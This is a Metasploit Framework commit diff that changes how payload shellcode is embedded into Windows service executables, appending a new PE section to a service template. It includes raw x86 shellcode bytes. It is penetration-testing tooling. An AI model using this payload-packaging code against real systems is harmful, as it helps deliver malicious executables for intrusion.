Switch to append mode for x86 service templates, fixes rapid7#5403

HD Moore · HD Moore · commit 9b17b6325988 · 2015-05-21T20:42:20.000-05:00
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -525,9 +525,6 @@ def self.to_win64pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
-    #opts[:exe_type] = :exe_sub
-    #return exe_sub_method(code,opts)
-
     # Append a new section instead
     appender = Msf::Exe::SegmentAppender.new({
       :payload  => code,
@@ -549,9 +546,9 @@ def self.to_win64pe(framework, code, opts = {})
   #
   # @return [String] Windows Service PE file
   def self.to_win32pe_service(framework, code, opts = {})
+    set_template_default(opts, "template_x86_windows_svc.exe")
     if opts[:sub_method]
       # Allow the user to specify their own service EXE template
-      set_template_default(opts, "template_x86_windows_svc.exe")
       opts[:exe_type] = :service_exe
       return exe_sub_method(code,opts)
     else
@@ -610,7 +607,12 @@ def self.to_win32pe_service(framework, code, opts = {})
         "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
         "\x51\x68\xC6\x96\x87\x52\xFF\xD5#{code_service_stopped}"
 
-      to_winpe_only(framework, code_service + code, opts)
+      # Append a new section to the template
+      Msf::Exe::SegmentAppender.new({
+        :payload  => code_service + code,
+        :template => opts[:template],
+        :arch     => :x86
+      }).generate_pe
     end
   end
 
